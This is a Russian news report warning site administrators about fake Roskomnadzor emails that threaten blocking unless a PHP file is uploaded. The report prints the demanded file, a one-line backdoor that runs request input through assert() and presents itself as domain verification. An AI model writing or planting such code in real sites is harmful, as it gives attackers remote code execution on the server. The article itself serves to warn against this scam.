Информационные технологииStfw.Ru 🔍
🕛

Злоумышленники рассылают поддельные письма от Роскомнадзора, угрожая блокировкой

От имени ведомства мошенники требуют у администраторов сайтов разместить на своих серверах вредоносный файл.От имени ведомства мошенники требуют у администраторов сайтов разместить на своих
От имени ведомства мошенники требуют у администраторов сайтов разместить на своих серверах вредоносный файл.




Как стало известно, злоумышленники запустили вредоносную кампанию якобы от имени Роскомнадзора. 25-26 августа нынешнего года администраторы доменных имен в зоне .ru получили электронную рассылку, подписанную ведомством. В письмах, отправленных с адреса zapret-info@roskomnadzor.org, сказано, что получатель должен разместить на сервере файл с названием reestr-id198617.php, который необходим для его идентификации в качестве администратора доменного имени.


Похоже на то, что мошенники решили воспользоваться ажиотажем вокруг внесения в реестр запрещенных сайтов и дальнейшего исключения из него «Википедии» за статью о наркотическом веществе. Поскольку блокировка ресурса в РФ осуществляется по решению суда, в фальшивых письмах от Роскомнадзора злоумышленники также ссылаются на судебное постановление, а точнее, на решение Новокуйбышевского городского суда Самарской области.


В письме идет речь о том, что аудитория сайта, администратором которого является потенциальная жертва, насчитывает свыше трех тысяч человек в сутки. В связи с этим получатель письма должен идентифицировать себя как администратора сайта. Для этого необходимо создать в корневой директории ресурса папку reestr, а в ней – файл reestr-id198617.php с текстом:


<?php



/*Подтверждение доменного имени www.ХХХХХ.ru*/



assert(stripslashes($_REQUEST[roskomnadzor]));?>




Отметим, что функция assert выполняет вредоносные инструкции.


В случае невыполнения «решения суда» в течение 72 часов с момента получения письма сайту грозит блокировка на территории РФ.       

Также по теме:
Обзор безопасности, новые вирусы, уязвимости в сети. Взлом и защита компьютера, хакерские атаки.